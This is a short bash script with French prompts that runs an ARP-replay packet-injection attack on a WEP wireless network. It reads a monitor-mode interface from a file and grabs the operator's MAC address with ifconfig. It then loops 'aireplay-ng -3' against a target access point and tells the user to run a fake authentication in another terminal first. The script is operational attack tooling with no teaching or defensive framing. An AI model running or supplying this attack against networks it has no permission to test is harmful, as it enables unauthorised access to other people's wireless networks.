#! /bin/bash
#############DEFAUTS###############
#début Jaune 
YS="\e[1;33m"
#couleur de fin
CE="\e[0m"
#début Rouge
RS="\e[1;31m"
#réglage variables fréquentes
YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=yes)"
YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=no)"
YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
PAKT="Appuyez sur "$YS"une touche$CE pour"
PAKTC="Appuyez sur "$YS"une touche$CE pour continuer..."
PAKTGB="Appuyez sur "$YS"une touche$CE pour revenir en arrière..."

####################################
printf '\033]2;INJECTION DE PAQUETS\a'
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
while true
do
	echo -e "----------------------"$RS"Injection de paquets"$CE"-----------------------"
	echo -e "Vous devez d'abord faire la fausse authentification! (Sur l'autre terminal)"
	if [[ "$FIRSTT" = "1" ]]
	then
		aireplay-ng -3 -b $WEPB -h $MYMAC $WLANNM
	else
		echo -e "$PAKT lancer une fausse anthentification..."
		read
		echo -e "Obtension de votre MAC...."
		sleep 1
		MYMAC=$(ifconfig $WLANNM | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
		echo -e "Votre MAC est $MYMAC"
		sleep 1
		echo -e "Lancement de l'injection de paquets..."
		sleep 1
		FIRSTT="1"
		aireplay-ng -3 -b $WEPB -h $MYMAC $WLANNM
	fi
	echo -e "Injectez à nouveau des paquets?"$YNYES": "
	read REF
	if [[ "$REF" = "n" ]]
	then
		exit
	else
		clear
		continue
	fi
done
